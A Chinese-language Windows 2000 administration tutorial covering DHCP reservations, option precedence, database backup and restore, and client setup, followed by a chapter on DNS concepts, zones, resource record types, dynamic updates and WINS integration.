    步骤6 在"名称"文本框中输入客户名称，如：dick。注意此名称只是一般的说明文字，并不是用户帐号的名称，但此处不能为空白。
    步骤7 如果需要在"注释"文本框内输入一些描述此客户的说明性文字。
    步骤8 选择"允许类型"
    步骤9 单击"添加"按钮
    步骤10 如果需要添加其它保留位置，则重复上述步骤4~9
    步骤11 单击"关闭"按钮结束
添加完成后，用户可用利用"作用域→地址租约"项进行查看，如果客户机客户机使用的仍然是以前的地址可用利用以下方法进行更新：
    在 Windows NT 或 Windows 2000 计算机中可利用命令 ipconfig /release 释放现有 IP 和 ipconfig /renew 更新 IP
    在 Windows95/98 计算机中可利用 Winipcfg.exe 程序中的释放、更新选项进行更新。
    改变保留客户的信息："作用域→保留→在右侧窗口中选择保留客户→操作→属性→作相应的改变→确定"
    改变保留客户的 DHCP 选项设置："作用域→保留→在右侧窗口中选择保留客户→操作→选项设置→选择选项→在"数据输入"输入相应的信息→确定"
    注意：如果在设置保留地址时，网络上有多台 DHCP 服务器存在，用户需要在其它服务器中将此保留地址排除，以便客户机可用获得正确的保留地址。

11.6.8 DHCP 选项设置
    DHCP 服务器除了可用为 DHCP 客户机提供 IP 地址外，还可用设置 DHCP 客户机启动时的工作环境，如可用设置客户机登录的域名称、DNS 服务器、WINS 服务器、路由器、默认网关等。在客户机启动或更新租约时，DHCP 服务器可用自动设置客户机启动后的 TCP/IP 环境。
    DHCP 服务器提供了许多的选项类型，但其中只有几项用户非常关心，如：默认网关、域名、DNS、WINS、路由器；这些选项在上面添加作用域时用户已经设置过了，在 DHCP 控制台中的作用域中有一项"作用域选项"中显示了用户所作的设置。为了进一步了解选项设置，用户以在作用域中添加 DNS 选项为例，说明 DHCP 的选项设置：
    步骤1 启动 "DHCP 控制台"
    步骤2 在左侧窗口中展开服务器，选择作用域选择"操作"单击"配置选项"
    步骤3 出现"配置 DHCP 选项"对话框 如图 11.17，在"基本选项"标签中的"可用选项"列表中选择"006 DNS 服务器"→在数据输入中的"新 IP 地址"文本框中输入 DNS 服务器的地址或在"服务器名"对话框中输入 DNS 服务器名称单击"解析"按钮服务器的 IP 地址也会出现在"新 IP 地址"文本框中→单击"添加"按钮
    步骤4 单击"确定"按钮结束

    当用户在客户机上利用 IPCONFIG/renew 命令更新 IP 地址租约时，用户会发现 DHCP 客户机的 DNS 服务器地址将立即被设为 如图 11.17 中的 198.188.188.1 。同时 DHCP 客户机的 IP 地址租约也被重新更新了。
    在 Windows 2000DHCP 服务器中用户可用针对不同的对相设置选项，上面用户是针对作用域所设置的选项，用户针对的对象包括：默认服务器选项、作用域选项、类选项、保留客户选项，下面说明它们之间的关系

    默认服务器选项（Default server options）
这些选项的设置，影响DHCP控制台窗口下该服务器下所有的作用域中的客户和类选项。
    作用域选项（Scope options）
这些选项的设置，只影响该作用域下的地址租约
    类选项（Class options）
这些选项的设置，只影响被指定使用该DHCP类ID的客户机。
    保留客户选项（Reserved client options）
这些选项的设置只影响指定的保留客户。
如果在服务器选项与作用域选项中设置了相同的选项，则作用域的选项起作用，即在应用时在作用域选项将覆盖服务器选项，同理类选项会覆盖作用域选项、保留客户选项覆盖以上三种选项，它们的优先级表示如下：
    保留客户选项 > 类选项 > 作用域的选项 > 服务器选项

11.7 维护 DHCP 的数据库文件
    Windows 2000 的 DHCP 服务器数据库使用的是增强性能的交互服务器存储机制。在安装DHCP服务时会在 %Systenroot%\Systen32\Dhcp 目录中自动创建下表中的文件。
    如图 11.18

    DHCP 服务数据库文件

文件
描述

Dhcp.mdb
DHCP 服务器数据库文件

Dhcptmp.mdb
DHCP数据库在运行时所使用的临时文件

J50.log J50#####.log
记录全部数据库事件的日志文件。在DHCP数据库恢复数据时 需要使用它

Res#.log
为急救所保留的日志文件

J50.chk
这是一个审核点（checkpoint）文件

    注意： J50.log 、 J50#####.log 、 Dhcp.mdb、Dhcptmp.mdb、Res#.log 这些文件不能以任何方式移动或修改。

DHCP 服务器数据库是一个动态数据库，在向客户机提供租约或客户机释放租约时它会自动更新。
    从图 11.18 中还可以发现另一个文件夹：backup，这个文件夹中保存着DHCP数据库及注册表中相关参数，可供修复时使用。DHCP 默认设置是每隔 15 分钟自动将它们备份到 backup 文件夹中。
    如果用户想更改这个时间间隔，可用通过修改 BackupInterval 这个注册表参数，它位于下列 registry key 中:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DHCPServer \Parameters.
    如果发现 DHCP 数据库中的设置与注册表中的相应设置不一致时，用户可用利用协调（Reconcile）的功能让两者的数据一致。协调的方法："选择作用域→操作→协调"，用户应该定期执行协调操作，以确保DHCP数据库的正确性。
    如果 DHCP 数据库发生错误或丢失，可以通过以下方法来恢复 ：
    步骤1 利用命令 net stop dhcpserver 停止 DHCP 服务
    步骤2 将现有的 DHCP 文件夹移动到其它目录中，命令如下：
md c:\Olddhcp
move %SystemRoot%\system32\DHCP\*.* C:\Olddhcp
    步骤3 删除错误的 DHCP 数据库
del %SystemRoot%\system32\DHCP\Dhcp.mdb
    步骤4 将备份的数据库拷贝到 DHCP 文件夹中
copy %SystemRoot%\system32\dhcp\backup\jet\new\dhcp.mdb %SystemRoot%\system32\dhcp\dhcp.mdb
    步骤5 重新启动 DHCP 服务
net start dhcpserver

    11.8 DHCP 客户机的设置
DHCP 服务器安装设置完成后，客户机就可用开始启用 DHCP 功能，以下列出任何在各种客户机上启用 DHCP 功能：
    11.8.1 启用 DOS 客户机的 DHCP 功能
如果 TCP/IP 尚未安装，则在安装时设置：Disable Automatic Configuration=0
如果 TCP/IP 已安装完成，可修改 Protocol.ini 文件中的 [TCP/IP] session，将 DisableDHCP 设为：DisableDHCP=0
    11.8.2 启用 LAN Manager 客户机的 DHCP 功能
如果 TCP/IP 尚未安装，则在安装 TCP/IP 时,在 "TCP/IP Setting "对话框中选择："Ensable Automatic DHCP Configuration"
如果 TCP/IP 已安装完成，可修改 Protocol.ini 文件中的 [TCPIP_XIF] session，将 DisableDHCP 设为：DisableDHCP=0

    11.8.3 启用 Windows for Workgroups 客户机的 DHCP 功能
    在安装或设置 TCP/IP 时，"单击 Network→Network Setup→Drivers…→Microsoft TCP/IP-32 →Setup…→ 选择 "Ensable Automatic DHCP Configuration "选项"→完成
    11.8.4 启用 Windows95/98 客户机的 DHCP 功能
    在安装或设置 TCP/IP 时，[单击控制面板双击"网络"选择 "TCP/IP" 单击"属性" ，选择 "IP 地址" 选项卡然后选择"自动获取 IP 地址" ] 如图 11.19

11.8.5 启用 Windows2000 客户机的 DHCP 功能
    在安装或设置 TCP/IP 时，[单击控制面板选择网络和拨号连接双击本地连接单击"属性" 选择 Internet 协议（TCP/IP）属性单击"常规"选项卡然后选择"自动获得 IP 地址"] 如图 11.20

11.8.6 启用 WindowsNT4.0 客户机的 DHCP 功能
    以 WindowsNT4.0Server 为例加以说明，同样适用于 Workstation 。[打开"控制面板" 选择"网络"选择"协议"选项卡单击 "TCP/IP 通信协议"，然后单击"属性"选择"从 DHCP 服务器中获得 IP 地址"，如图 11.21所示。

返回


DNS 服务器的配置与管理

《一键清理系统垃圾》

DNS 服务器的配置与管理

本章所介绍的内容：
1.DNS 的概念和原理
2.DNS 服务器的安装
3.DNS 服务器的配置与管理
4.DNS 和 WINS 的结合使用
5.客户机的 DNS设置

    5.1 DNS 服务器的概念和原理
    DNS 是域名系统的缩写, 它是嵌套在阶层式域结构中的主机名称解析和网络服务的系统。当用户提出利用计算机的主机名称查询相应的 IP 地址请求的时候， DNS 服务器从其数据库提供所需的数据。
§　DNS 域名称空间：指定了一个用于组织名称的结构化的阶层式域空间
§　资源记录：当在域名空间中注册或解析名称时，它将 DNS 域名称与指定的资源信息对应起来
§　DNS 名称服务器： 用于保存和回答对资源记录的名称查询
§　DNS 客户：向服务器提出查询请求，要求服务器查找并将名称解析为查询中指定的资源记录类型

5.1.1 DNS 域名空间
    DNS 域名空间是一种树状结构如图 5.1。
    目前由InterNIC管理全世界的 IP 地址，在 InterNIC 之下的 DNS 结构分为多个Domain,如图 5.1中 root domain下的七个 top-level domain 都归 InterNIC 管理，上图中还显示了由 InterNIC 分配给微软的域名空间。Top-level domain 可以再细分为 second-level domain 如 "Microsoft" 为公司名称,而 second-level domain 又可以分成多级的 subdomain 如 "example、www" ,在最下面一层被称为 hostname(主机名称)如 "host-a" ,一般用户使用完整的名称来表示 (FQDN)，如 "host-a.example.Microsoft.com"。

DNS 域名
    DNS 利用完整的名称方式来记录和说明 DNS 域名，就象用户在命令行显示一个文件或目录的路径，如 "C:\Winnt\System32\Drivers\Etc\Services.txt"。同样在在一个完整的 DNS 域名中包含着多级域名。
如 "host-a.example.microsoft.com." 其中 "host-a" 是最基本的信息(一台计算机的主机名称)"example"表示主机名称为host-a的计算机在这个子域中注册和使用它的主机名称 ，"microsoft" 是 "example" 的父域或相对的根域 (即 second-level domain)，"com"是用于表示商业机构的top-level domain，最后的句点表示域名空间的根 (root)。

区域(zone)
    区域 (zone) 是一个用于存储单个 DNS 域名的数据库，它是域名称空间树状结构的一部分， DNS 服务器是以 zone 为单位来管理域名空间的，zone 中的数据保存在管理它的 DNS 服务器中。当在现有的域中添加子域时，该子域既可以包含在现有的 zone 中，也可以为它创建一个新 zone 或包含在其它的 zone 中。一个 DNS 服务器可以管理一个或多个 zone ,同时一个 zone 可以由多个 DNS 服务器来管理。
    用户可以将一个 domain 划分成多个 zone 分别进行管理以减轻网络管理的负荷，如图 5.2 所示，

microsoft.com 是一个域，用户可以将它划分为两个 zone：microsoft.com和 example.Microsoft.com,zone 的数据分别保存在单独的 DNS 服务器中。因为zone"example.Microsoft.com" 是从"domain" 延伸而来，所以用户可以将 domain"microsoft.com" 称为 zone"example.Microsoft.com" 的 zone root domain。

5.1.2 DNS 查询的工作方式
    当 DNS 客户机向 DNS 服务器提出查询请求时，每个查询信息都包括两部分信息：
§　一个指定的 DNS 域名，要求使用完整名称(FQDN)
§　指定查询类型，既可以指定资源记录类型又可以指定查询操作的类型
    如指定的名称为一台计算机的完整主机名称"host-a.example.microsoft.com.", 指定的查询类型为名称的A (address) 资源记录。可以理解为客户机询问服务器"你有关于计算机的主机名称为'hostname.example.microsoft.com.'的地址记录吗？当客户机收到服务器的回答信息时，它解读该信息，从中获得查询名称的 IP 地址。
    DNS 的查询解析可以通过多种方式实现。客户机利用缓存中记录的以前的查询信息直接回答查询请求， DNS 服务器利用缓存中的记录信息回答查询请求， DNS 服务器通过查询其它服务器获得查询信息并将它发送给客户机。这种查询方式称为递归查询。
    另外, 客户机通过 DNS 服务器提供的地址直接尝试向其它 DNS 服务器提出查询请求。这种查询方式称为反复查询。
    当 DNS 客户机利用 IP 地址查询其名称时，被称为反向查询。

本地查询：
    下图 5.3显示了 DNS 查询的完整过程：

当在客户机中 Web 浏览器中输入一个 DNS 域名，则客户机产生一个查询并将查询传给 DNS 客户服务利用本机的缓存信息进行解析，如果查询信息可以被解析则完成了查询。
    本机解析所用的缓存信息可以通过两种方式获得：
§　如果客户机配置了 host 文件，在客户机启动是 host 文件中的名称与地址映射将被加载到缓存中。
§　以前查询时 DNS 服务器的回答信息将在缓存中保存一段时间
    如果在本地无法获得查询信息，则将查询请求发送给 DNS 服务器。查询请求首先发送给主 DNS 服务器，当 DNS 服务器接到查询后，首选在服务器管理的区域的记录中查找，如果找到相应的记录，则利用此记录进行解析。如果没有区域信息可以满足查询请求，服务器在本地的缓存中查找，如果找到相应的记录则查询过程结束。
    如果在主 DNS 服务器中仍无法查找到答案，则利用递归查询进行名称的全面解析，这需要网络中的其它 DNS 服务器协助，默认情况下服务器支持递归查询。

为了 DNS 服务器可以正常的进行递归查询，首选需要一些关于在 DNS 域名空间中的其它 DNS 服务器的信息以便通信。信息以 root hints 的形式提供一个关于其它 DNS 服务器的列表。利用 root hints DNS 服务器可以进行完整的递归查询。
    如图5.4显示了利用递归查询来查询名称为 "host-b.example.microsoft.com." 的计算机的过程：
    首选，主DNS服务器解析这个完整名称，以确定它属于那个 top-level domain, 即 "com"。接着它利用转寄查询的方式向 "com" DNS 服务器查询以获得 "microsoft.com" 服务器的地址，然后以同样的方法它从 "microsoft.com" 服务器获得 "example.microsoft.com" 服务器的地址，最后它与名为

"example.microsoft.com." 的DNS服务器进行通信，由于用户所要查询的主机名称包含在该服务器管理的区域中，它向主 DNS 服务器方发送一个回答，主 DNS 服务器将这个回答转发给提出查询的客户机，到此递归查询过程结束。

返回多个查询响应
    在前面所描述的查询都假设在查询过程结束时只一个肯定回答信息返回给客户机，然而在实际查询时还可能返回其它回答信息：
§　授权回答 (authoritative answer)：在返回给客户机的肯定回答中加入了授权字节，指明信息是从查询名称的授权服务器获得的
§　肯定回答 (positive answer)：由被查询的RR (resource records)或一个RRs列表组成，与查询的DNS名称和查询信息中的记录类型相匹配。
§　提名回答 (referral answer ):包含未在查询中指定的附加资源记录，它返回给那些不支持递归查询的客户机，这些附加信息可以帮助客户机继续进行转寄查询
§　否定回答 (negative answer )：当遇到以下情况之一时，服务器发送否定回答
§　授权服务器报告所查询的名称不在 DNS 域名空间内
§　授权服务器报告所查询的名称在 DNS 域名空间内，但没有记录与查询指定的名称想匹配
缓存与 TTL
    当 DNS 服务器通过外界查询到 DNS 客户机所需的信息后，它会将此信息在缓存中保存一份，以便下次客户机再查询相同的记录时，利用缓存中信息直接回答客户机的查询。这份数据只会在缓存中保存一段时间，这段时间称为 TTL (Time-To-Live)。当记录保存到缓存中， TTL 计时启动，当 TTL 时间递减到 0 的时候，记录被从缓存中清除。TTL 默认值为 3600 秒 (1小时)。

    5.1.3. 区域的复制与传输
    由于区域 (zone) 在 DNS 中所处的重要地位，用户可以通过多个 DNS 服务器提高域名解析的可靠性和容错性。当一台 DNS 服务器发生问题时，可以用其它DNS服务器提供域名解析。这就需要利用区域复制和同步方法保证管理区域的所有DNS服务器中域的记录相同。在 Windows 2000 服务器中, DNS 服务支持增量区域传输 (incremental zone transfer)。所谓增量区域传输就是在更新区域中的记录时，DNS 服务器之间只传输发生改变的记录，因此提高了传输的效率。 在以下情况区域传输启动：
§　当管理区域的辅助 DNS 服务器启动的时候
§　当区域的刷新时间间隔过期后
§　当在主 DNS 服务器记录发生改变并设置了通告列表
    DNS 通告
    所谓 DNS 通告是利用"推"的机制，当 DNS 服务器中的区域记录发生改变时，它将通知选定的 DNS 服务器进行更新，被通知的服务器启动区域复制操作。

5.1.4. 在 Windows2000 Server 中的 DNS 服务的新特性
    与 Active Directory 的集成
    Active Directory 提供了一个企业级的工具，利用它在网络中组织、管理、定位资源。
    当DNS服务与 Active Directory 集成在一起，它发生了两个明显的变化：
§　DNS 需要安装在 Windows 2000 域控制器中 (domain controllers)。Net Logon 服务利用新的 DNS 服务器所支持的 SRV (service) 资源记录提供客户机注册的服务
§　用户可以利用 Active Directory 来存储、集成及复制区域
    DNS 服务在域控制器中是默认安装的，因为域控制器的定位和活动目录的应用都需要 DNS 服务器的支持。

一旦活动目录安装完成，用户可以有两种方式保存和复制区域：
§　利用文本文件存储标准区域信息
区域信息存储在 %SystemRoot%\System32\Dns 目录下的 *.dns 文件中。
§　利用活动目录存储完整目录区域信息
区域信息存储在活动目录树中的域对象容器中，每个目录集成区域存储在一个 dnsZone 的容器对象中。
    在网络中配置 DNS 服务器支持活动目录将具有以下优点：
§　基于活动目录的 Multi-master 信息更新和安全性的提高
    在标准区域存储模式中，DNS 的更新是基于一种被称为 single-master 更新模式，在这种模式中，单一的授权 DNS 服务器被指定为主信息源，如果服务器出现问题则 DNS 客户机的请求将无法进行处理。而使用 multi-master 更新模式，则任意一台 DNS 服务器都可以被指定为区域的主信息源，因为区域 (zone) 的全部信息记录是由活动目录数据库进行管理的，并且它将被复制到所有的域控制器中，任何域控制器都可以利用 DNS 服务更新区域信息，并处理 DNS 客户机的请求。

§　当在活动目录 domain 中加入新的域控制器时 Zones 的信息将自动复制到新的域控制器中
§　由于DNS域名空间信息存储在活动目录中，用户现在可以容易的规划和管理 DNS 和活动目录
§　与标准的 DNS 目录复制相比现在的目录复制更为快捷有效
    支持 Unicode 字符
    在以前的制定的 DNS 标准中规定只能使用 ASCII 字符编码和显示名称。在使用 DNS 进行 Internet 设置时，明显限制了在名称中使用扩展字符的使用。为了突破这种限制，在 Windows2000 中 DNS 服务提供对 UTF-8 的支持。
    在 Windows 2000 服务器启动时，DNS 服务采用 UTF-8 编码识别方式。即当服务器接收或使用的数据为 UTF-8 编码字符时，服务器可以在区域中加载或存储这些数据。当然 Windows2000 与使用传统 US-ASCII 字符的DNS服务器兼容。

5.2. 安装DNS服务器
    步骤1 启动"添加/删除程序"，之后出现"添加/删除程序"对话框
    步骤2 单击"添加/删除 Windows 组件"，出现 "windows 组件向导"单击下一步"出现 "Windows组件" 对话框从列表中选择"网络服务"如图 5.5

步骤3 单击"详细内容"，从列表中选取"域名服务系统 (DNS)", 如图 5.6， 单击"确定"
    步骤4 单击"下一步"输入到 Windows2000 Server 的安装源文件的路径，单击"确定"开始安装 DNS 服务
    步骤5 单击"完成"，当回到"添加/删除程序"对话框后，单击"关闭"按钮
    步骤6 关闭"添加/删除程序"窗口。
    安装完毕后在管理工具中多了一个 "DNS" 控制台(安装结束后不用重新启动计算机)
    在安装 Active Directory 的同时也安装和配置了 DNS 服务器，所以就不用在重复上述的安装过程了，具内容详见 Active Directory 的安装于配置。

5.3. DNS 服务器的设置与管理
    5.3.1. DNS 的启动设置
    DNS 服务器在启动时，需要从相关配置文件中知道它所要管理的 zone 的信息，及文件的位置。对于符合 BIND (Berkeley Internet Name Domain) 规格的 DNS 服务器是利用 bootfile 来获得配置信息的。在 Windows2000 中可以利用下表中的方法启动 DNS 服务：

方式

描述
    从注册表 (Registry) 引导

初始化 DNS 服务时从注册表中读取配置参数，DNS 服务的默认引导方式。
    从文件引导
初始化 DNS 服务时从符合 BIND 规格的 bootfile 中读取配置参数，首选必须从其它 BIND 服务器拷贝一份 bootfile 文件，在启动后相关配置参数将保存在注册表中。
    从 DS 引导
初始化 DNS 服务时从 Active Directory 中读取配置参数

在 DNS 服务器启动后，用户可以看到如图 5.7 DNS 服务所在的计算机已经添加到 DNS 控制台中，其中包括"正向搜索区域、反向搜索区域"目录。

5.3.2. 添加 DNS Zone
    因为 DNS 的数据是以 zone 为管理单位的，因此用户必须先建立 zone。添加 Zone 的具体步骤如下：
    步骤1 在 DNS 控制台中左侧窗体中选择服务器单击"操作"菜单选择"创建新区域"，启动"创建新区域"向导
    步骤2 在选择区域类型对话框中选择"标准主要区域"如图 5.8
    步骤3 在"选择区域搜索类型"中选择"正向搜索"则创建的新区域存放在正向搜索区域目录中

步骤4 在区域名对话框中输入新区域的域名如图 5.9，如果创建辅助区域则需要输入"主要区域"的域名
    步骤5 在文件名对话框中新文件文本框中自动输入了以域名为文件名的 DNS 文件，如果是创建"辅助区域"则选择"现存文件"并在文本框中输入文件名
    步骤6 在完成设置对话框中显示以上所设置的信息单击"完成"按钮

下面用户对添加区域中的记录类型加以说明
记录的格式：
    所有的资源记录(RRs) 都利用相同 top-level 子段组成其指定的格式

子段
描述

    Owner
在 DNS 管理器中说明记录的所有者的 DNS 域名，与记录属性中的父类域名是一样的

    Time-To-Live (TTL)
对于许多记录这项是可选，它表示该记录在其它 DNS 服务器的缓存中保存的时间长度

    Class
对于许多记录这项是可选的，它利用标准的记忆文本表示记录所属的类，如在某个记录中的类子段中设置为 "IN" 表示记录属于 Internet 类

    Type
用标准的记忆文本表示记录的类型

    Record-specific data
记录必须具备的子段，它根据不同的记录类型和类以不同长度的子段表示记录信息

常用记录类型的说明
主机[A]
描述: 主机地址记录。在 DNS 域名与 IP 地址之间建立映射关系
语法: owner class ttl A IP_v4_address
例子: host1.example.microsoft.com. IN A 127.0.0.1
别名[CNAME]
描述: 用来表示用在该区域中的其它资源记录类型中已指定名称的替补或别名 DNS 域名。
语法: owner ttl class AFSDB subtype server_host_name
例子: aliasname.example.microsoft.com. AFSDB 1 truename.example.microsoft.com.
主机信息[HINFO]
描述: 用来说明映射到特定 DNS 主机名的 CPU 类型和操作系统类型的 RFC-1700 保留字符串类型，这个信息可以被应用程序通信协议使用。
语法: owner ttl class HINFO cpu_type os_type
例子: my-computer-name.example.microsoft.com. HINFO INTEL-386 WIN32
邮箱[MB]
描述: 用来将指定的域邮箱名映射到这个邮箱的主机的当前区域中的主机地址记录
语法: owner ttl class MB mailbox_hostname
例子: mailbox.example.microsoft.com. MB mailhost1.example.microsoft.com

邮箱或通信信息 MINFO
描述: 用来指定负责维护该记录中特定通信名单或邮箱的联系域邮箱名称。同时，还被用来指定接收与该记录中特定通信名单或邮箱有关的错误信息的邮箱
语法: owner ttl class MINFO responsible_mailbox error_mailbox
例子: administrator.example.microsoft.com. MINFO resp-mbox.example.microsoft.com err-mbox.example.microsoft.com
邮件交换器 [MX]
描述: 用来向特定邮件交换器提供消息路由，该主机作为指定 DNS 域名的邮件交换器。MX 记录需要一个16-位整数来表示消息路由中的主机优先级，多个邮件交换在消息一中被指定。对于这个记录类型中的每个邮件交换主机，需要一个相应的主机地址类型记录。
语法: owner ttl class MX preference mail_exchanger_host
例子: example.microsoft.com. MX 10 mailserver1.example.microsoft.com
指针记录 [PTR]
描述:用来指向域名空间中的某个位置。PTR记录通常在特殊域中来执行地址到名称镜像的反向搜索。每个记录提供要指向域名称空间的某个其它位置的简单数据。
Syntax: owner ttl class PTR targeted_domain_name
例子: 1.0.0.10.in-addr.arpa. PTR host.example.microsoft.com.

服务记录 [SRV]
描述: SRV 资源记录允许管理员使用单一 DNS 域的多个服务器，容易的用管理功能将 TCP/IP 服务从一个主机移到另一个主机，并且将服务提供的程序主机分派为服务的主服务器，将其它的分派为辅助的
语法: service.protocol.name ttl class SRV preference weight port target
例子: ldap.tcp.ms-dcs SRV 0 0 389 dc1.example.microsoft.com SRV 10 0 389 dc2.example.microsoft.com
已知服务记录 [WKS]
描述: 用来描述一个特定 IP 地址上特定通讯协议支持的 TCP/IP 服务，它提供 TCP 和 UDP 可使用性信息。如果服务器同时支持 TCP 和 UDP 的已知服务，或者有多个支持服务的 IP 地址，多个 WKS 记录会被使用
语法: owner ttl class WKS address protocol service_list
例子: example.microsoft.com. WKS 10.0.0.1 TCP ( telnet smtp ftp )
    在"起始颁发机构" SOA 中，记录了这个 Zone 中 DNS 服务器是那一台主机，也记录着负责本 zone 的管理员的邮件地址，如果以后在安装邮件服务器需要修改该信息时，注意将邮件地址中的 "@" 符改为句点 "." ，因为 "@" 是保留字，代表 zone；另外，要使用域完整名称 FQDN，不要漏掉最后的句点。可以通过 "zone→属性→起始颁发机构"对管理员邮件地址进行修改。

5.3.3 添加 DNS Domain
    在一个区域中用户还可以按地域、职能等划分为多个子域便于管理，如用户可以在 NT2000.com 域中按部门划分为"sale","accounting","mis"等部门。下面用户举例说明在 nt2000.com 域中加入 accounting 子域：
    步骤1 单击 nt2000.com 后单击"操作"单击"新建"，选择域
    步骤2 在域对话框中输入域名
    步骤3 单击确定
    添加反向查询区域 (zone)
    反向查询可以让用户利用 IP 地址查询名称。添加反向查询的具体步骤如下：

    步骤1 在DNS控制台中选择"反向查询区域→操作→创建
新区域"
    步骤2 启动创建新区域向导→在选择区域类型对话框中选择标准主要区域
    步骤3 在网络 ID 对话框中输入反向搜索区域的网络标识 (假设提供反向查询的 zone 为198.188.188),向导会自动输入子网掩码并在文件名对话框中输入的新文件名称如图 5.10中的 255.255.255,188.188.198.in-addr.arpa.dns。

步骤4 单击"完成"按钮则在反向搜索区域中添加了一个新区域如图 5.11

5.3.4 设置 DNS 服务器的动态更新
    在以前版本的 DNS 服务器中的主机地址记录是手工添加的，当主机的 IP 地址发生变化时，需要管理员手工修改，在 Windows2000 中可以利用动态更新的方式，当 DHCP 主机 IP 地址发生变化时，会在 DNS 服务器中自动更新，这样减轻了管理员的负荷。具体设置如下：
    步骤1 首选用户需要对 DHCP 服务器的属性进行设置，选择 DHCP 服务器，显示属性单击动态DNS如图 5.12在其中选中"启动 DNS 客户信息动态更新"并选中选项中的"当租约过期时取消正向搜索、对非动态 DNS 客户更新"两个选项

步骤2 在 DNS 控制台中展开正向搜索区域，选择区域，单击"操作"，单击属性，在"常规"标签中在下方的动态更新下拉列表中选择"允许更新"→确定如图 5.13
    步骤3 展开反向搜索区域，选择反向区域单击操作单击属性并在"常规"标签中下方选择"允许更新"。
    这样在客户信息改变时，它在 DNS 服务器中的信息也会自动更新。
    服务器的转发程序的设置
    当 DNS 服务器无法提供 DNS 客户机需要查询的数据时，它可以通过一台有转发器功能的 DNS 服务器转发此查询到其它 DNS 服务器进行递归查询，但必须设置本服务器可以使用该转发器。通常在用户需要通过慢速连接访问远端DNS服务器时需要使用转发器。
    选择 DNS 服务器→操作→属性→转发程序标签→输入转发器的 IP 地址→如果要将此服务器作为转发器的辅助服务器可以选择"作为辅助服务器操作"选项，这样如果转发器无法提供所需信息时，则此服务器直接将结果发送给客户机，不再进行查询。

5.3.5. 修改区域传输的通知列表
    对"起始颁发机构（SOA）"参数的设置
    单击区域单击"操作"，单击属性进入起始颁发机构（SOA）标签如图 5.14
    序列号：当执行区域传输时，首选检查序列号，只有当主服务器的序列号比辅助服务器的序列号大的时候（表示辅助服务器中的数据已过时）复制操作才会执行。
    刷新间隔：设置辅助服务器隔多长时间需要检查其数据，执行区域传输
    重试间隔：当在刷新间隔到期时辅助服务器无法于主服务器通讯，需等多久再重试
    过期间隔：如果辅助服务器一直无法与主服务器建立通讯，在此时间间隔后辅助服务器不再执行查询服务，因为其包含的数据可能是错误的。

最小 TTL：服务器查询到的数据在缓存中的保存时间
    修改通知列表
    选择区域的属性中的区域传输标签中设置与那些服务器进行区域传输，默认情况下将与网络中的所有DNS服务器进行区域传输，也可以设置为只与名称服务器列表中的服务器进行区域传输或与指定的服务器进行区域传输。如图 5.15
    当 DNS 服务器启动时会自动执行区域传输，以便将主服务器中的数据复制到辅助服务器中，另外用户还可以设置在DNS服务器运行过程中定期执行区域传输操作，当主服务器的数据变化时，它会将更改通知发送给想应的服务器，则相应的服务器可以不必等到刷新间隔而立即执行传输操作。

    通过区域属性，进入区域传送标签，"通知"按钮出现如图 5.16
    永不发送区域通知：在主服务器的数据发生改变时不发送区域通知给其它服务器
    通知名称服务器页上的服务器：在主服务器的数据发生改变时向名称服务器列表中的服务器发送通知，只通知指定的服务器。

5.4 与 WINS 的结合使用
    当 DNS 服务器与 WINS 服务结合使用后，在DNS域名空间无法查询的名称可以利用 WINS 管理的 NetBIOS 名称空间进行查询。 当 DNS 服务器与 WINS 服务结合使用时，在区域中加入两个专门的 WINS 资源记录类型 (WINS 和 WINS-R 资源记录) ，当使用 WINS 记录时，如果 DNS 无法在域名空间中查找到相应的主机名称，则将记录转送到这个记录所设置的 WINS 服务器中，WINS-R 记录提供反向查询的功能。在一个区域中启动 WINS 查询功能具体步骤如下：
    步骤1 首选在 DNS 服务器中选择一个区域由简单击属性属性单击WINS标签
    步骤2 选择"使用 WINS 名称解析"选项，在下方的 WINS 服务器中添加 WINS 服务器的 IP 地址如图 5.17
    步骤3 如果在区域传输时 用户不想将这条记录复制给其它 DNS 服务器，则用户可以选中"不复制此记录"

设置完毕后，在数据库中将添加一个类型为WINS的记录。
    举例来说，如果将 nt2000.com 这个域设置为"使用 WINS 名称解析"，当客户机向服务器查询主机名为"one.nt2000.com"的 IP 地址时，如果 DNS 服务器无法在其管理的域名空间中解析此主机名称，则将此查询转发至设置的 WINS 服务器进行解析。注意DNS服务器并

不是将完整主机名称发送给 WINS 服务器，而是只发送主机名称"one"，然后由WINS服务器提供其解析的 IP 地址，DNS 服务器再将其发送给客户机。由于WINS数据库中保存的是计算机名（NETBIOS名），而不是主机名称，所以为了让 WINS 服务器正常发挥作用，则在设置计算机的主机名称时，将其设置的域主机名称相同。
    当 DNS 服务器在将查询结果发送给客户机的时候，它将结果保存到缓存中一份。下次再有相同查询时，可以利用缓存中的数据直接回答，提高了查询速度。利用高级设置其缓存中的数据保存时间 TTL。如图 5.18超时值放入高速缓存：设置数据在缓存中的保存时间
    查找超时值：在 DNS 服务器将查询发送给 WINS 服务后，如果在此时间间隔内 WINS 服务器没有作出回答，则DNS服务器将此查询结果发送给客户机。
    设置 WINS 反向查询
    在DNS控制台中展开反向搜索区域，选择区域→属性→选择 WINS-R 标签，在其中选择"使用 WINS 反向搜索"选项如图 5.19，然后在"附加到反向搜索上的域名"文本框中输入DNS 域名称，DNS 服务器会将由 WINS 查询到的计算机名与域名合并后，再发送给客户机。如查询结果为 test , 而域名称为 nt2000.com 则返回给客户机的结果为 test.nt2000.com

5.5 客户机的 DNS 设置
    在成功安装 DNS 服务器后，就可以在 DNS 客户机启用 DNS 服务，下面具体说明如何在客户机上设置并启用 DNS 服务
    5.5.1 LAN Manager 的DNS设置
    在安装 TCP/IP 或执行 SETUP 程序时或修改 TCPUTILS.INI 文件中的 [NDR]session ，在 "TCP/IP Setting" 中选择 <Advanced…>，
    Username: 登录的用户名称
    Hostname: 客户机的主机名称
    选择 "use DNR for hostname resoluteion"
    在 "Primary Nameserver Ip Address" 处，输入主DNS服务器IP地址
    在 "Secondary Nameserver Ip Address" 处，输入辅助DNS服务器IP地址
    在 "Domain Name Suffix" 处，输入 DNS 域名称

5.5.2 Windows98 的 DNS 设置
    进入 TCP/IP 高级属性
    选择 DNS 配置标签，选择"启用 DNS"选项如图 5.20
    输入主机名称、域名称，添加 DNS 服务器 IP 地址

5.5.3 WindowsNT4.0 的 DNS 设置
    在 WindowsNT4.0 server/workstation 中， TCP/IP 通信协议单击"属性" 选择 "DNS" ，在 DNS 标签中如图 5.21 中
    主机名：输入计算机的主机名称
    域：主机所隶属的域名称
    DNS 服务器搜索顺序：添加 DNS 服务器的地址
    域后缀搜索顺序：添加主机名称的后缀

